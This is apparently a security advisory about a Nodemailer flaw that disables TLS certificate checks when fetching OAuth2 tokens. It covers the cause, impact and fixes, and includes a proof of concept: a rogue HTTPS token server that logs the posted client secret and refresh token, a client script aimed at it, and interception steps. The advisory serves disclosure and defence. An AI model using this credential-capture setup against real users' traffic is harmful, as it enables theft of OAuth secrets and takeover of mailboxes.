Nodemailer: Improper TLS Certificate Validation in OAuth2 Token Fetch, GHSA‑r7g4‑qg5f‑qqm2 (Medium) -DC-Jun2026-403


How GHSA‑r7g4‑qg5f‑qqm2 works

Nodemailer is a popular Node.js module that simplifies sending emails from applications. To obtain OAuth2 tokens (e.g., for Gmail or other providers), Nodemailer performs outbound HTTPS requests using an internal HTTP/HTTPS fetch client implemented in `lib/fetch/index.js`.

Root cause

Inside `lib/fetch/index.js`, the HTTPS request options explicitly set `rejectUnauthorized: false`. This directive disables TLS certificate verification for every request made through that internal client:

  • Self‑signed certificates are accepted without warning.
  • Invalid certification authority (CA) chains are trusted.
  • Hostname validation is completely bypassed.
  • Any endpoint – even attacker‑controlled ones – is treated as legitimate.

Vulnerable flow

When an application uses OAuth2 authentication, the vulnerable chain is triggered:
1. OAuth2 Transport – The application configures Nodemailer with OAuth2 credentials.
2. XOAuth2 token generation – Nodemailer tries to obtain or refresh an access token.
3. Internal HTTPS fetch client – The request is handed to lib/fetch/index.js.
4. Request with `rejectUnauthorized: false` – TLS validation is disabled.
5. Attacker‑controlled endpoint trusted – A machine‑in‑the‑middle (MITM) can present an invalid or self‑signed certificate.
6. OAuth credentials transmitted – The OAuth `client_id`, `client_secret` and `refresh_token` are posted over the unverified connection, and whatever `access_token` comes back is accepted from it.

Impact

Because TLS verification is disabled, a MITM attacker who can intercept traffic between the Nodemailer client and the OAuth2 endpoint can:
– Capture the OAuth client secret and refresh token, and control the access token the client receives.
– Use those tokens to impersonate the user, read emails, send arbitrary messages, and maintain persistent access.
– Tamper with OAuth responses, injecting malicious tokens or modifying expiry times.
The flaw effectively downgrades the HTTPS security guarantees for sensitive OAuth exchanges, making them vulnerable to straightforward interception attacks.

DailyCVE Form

Platform: Node.js/npm
Version: ≤8.0.7
Vulnerability: TLS Validation Disabled
Severity: Medium
Date: 2026-06-15

Prediction: 2026-06-15

What Undercode Say

The PoC below simulates the interception locally: instead of spoofing traffic to the real token host, it points Nodemailer's `accessUrl` at a rogue HTTPS server with a self-signed certificate. A client that validates certificates would refuse the connection; the vulnerable fetch client posts the credentials anyway.
1. Generate a self-signed certificate (key.pem, cert.pem) if not available
openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1 -subj "/CN=localhost"
2. Start the malicious OAuth2 server (poc/evil-oauth.js)
node poc/evil-oauth.js
3. In another terminal, run the Nodemailer OAuth2 test (test.js)
node test.js

Malicious HTTPS OAuth server (`poc/evil-oauth.js`)

// PoC: rogue HTTPS "token endpoint" served with the self-signed cert from step 1.
// A validating client refuses this server; the vulnerable Nodemailer fetch client
// accepts it and posts the OAuth2 credentials anyway.
const https = require('https');
const fs = require('fs');
https.createServer({
  key: fs.readFileSync('./key.pem'),
  cert: fs.readFileSync('./cert.pem')
}, (req, res) => {
  console.log('\n==== REQUEST INTERCEPTED ====');
  console.log(req.method, req.url);
  let body = '';
  req.on('data', chunk => body += chunk);
  req.on('end', () => {
    // Form body carries client_id, client_secret, refresh_token and grant_type
    console.log('\nPOST BODY:');
    console.log(body);
    // Return an attacker-chosen token so the client carries on with it
    res.writeHead(200, { 'Content-Type': 'application/json' });
    res.end(JSON.stringify({ access_token: 'attacker_token', expires_in: 3600 }));
  });
}).listen(8443, () => console.log('Malicious HTTPS OAuth server listening on 8443'));

Nodemailer OAuth2 test (`test.js`)

// PoC client: a normal Gmail OAuth2 transport whose token endpoint (accessUrl)
// is redirected to the rogue server. No accessToken is supplied, so Nodemailer
// must fetch one through lib/fetch/index.js before it can send.
const nodemailer = require('nodemailer');
const transporter = nodemailer.createTransport({
  service: 'gmail',
  auth: {
    type: 'OAuth2',
    user: '[email protected]',              // mailbox address (redacted on the page)
    clientId: 'CLIENT_ID_REDACTED',
    clientSecret: 'CLIENT_SECRET_REDACTED',
    refreshToken: 'REFRESH_TOKEN_REDACTED',
    accessUrl: 'https://localhost:8443/token' // rogue endpoint, self-signed cert
  }
});
transporter.sendMail({
  from: '[email protected]',
  to: '[email protected]',
  subject: 'PoC',
  text: 'test'
}, (err, info) => {
  // The SMTP step may still fail (the token is bogus); the credentials have
  // already been posted to the rogue server by the time this callback runs.
  console.log('\n==== NODEMAILER RESULT ====');
  if (err) console.error(err);
  else console.log(info);
});

Exploit

  1. Attacker sets up a machine‑in‑the‑middle position (e.g., rogue Wi‑Fi, ARP spoofing, compromised router).
  2. Attacker hosts an HTTPS endpoint with a self‑signed or otherwise invalid certificate.
  3. When the vulnerable Nodemailer application requests an OAuth2 token (e.g., during login or token refresh), the internal fetch client sends the credentials to the attacker’s endpoint without validating the certificate.
  4. Attacker logs the intercepted `POST` body containing client_id, client_secret and refresh_token, and returns an access_token of their choosing in the response.
  5. The attacker can now use those tokens to access the victim’s email account, send emails, and maintain persistent access.

Protection

  • Immediate fix: Upgrade Nodemailer to version 8.0.8 or later, where `rejectUnauthorized` is no longer hard‑coded to `false` for OAuth2 requests.
  • If upgrade is impossible: Do not rely on the transport's `tls: { rejectUnauthorized: true }` option; it governs the SMTP connection, not the internal fetch client that performs the token request. Instead, keep the token exchange out of Nodemailer entirely: obtain the access token with your own certificate-validating HTTPS client and hand it to the transport through the documented `oauth2_provision_cb` hook (`transporter.set('oauth2_provision_cb', ...)`), or pass a pre-obtained `accessToken` in `auth`.
  • Network mitigation: Enforce strict egress filtering for OAuth2 endpoints (allow only known, trusted IP addresses) and monitor for connections to unexpected or self‑signed endpoints. Note that destination filtering does not stop an on‑path attacker who intercepts traffic addressed to the legitimate endpoint; only certificate validation does.
  • Credential rotation: Rotate OAuth client secrets, refresh tokens, and access tokens after applying the fix.

Impact

  • OAuth credential theft – Attacker captures the client secret and refresh token, and controls the access token handed back to the client.
  • Unauthorized email access – Attacker can read all emails of the compromised account.
  • Persistent token abuse – Stolen refresh tokens can be used to obtain new access tokens indefinitely.
  • Unauthorized mail sending – Attacker can send emails from the victim’s address.
  • Mailbox compromise – Full control over the victim’s mailbox, including contacts and settings.
  • Interception/tampering of OAuth responses – Attacker can modify token expiration or inject malicious tokens.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
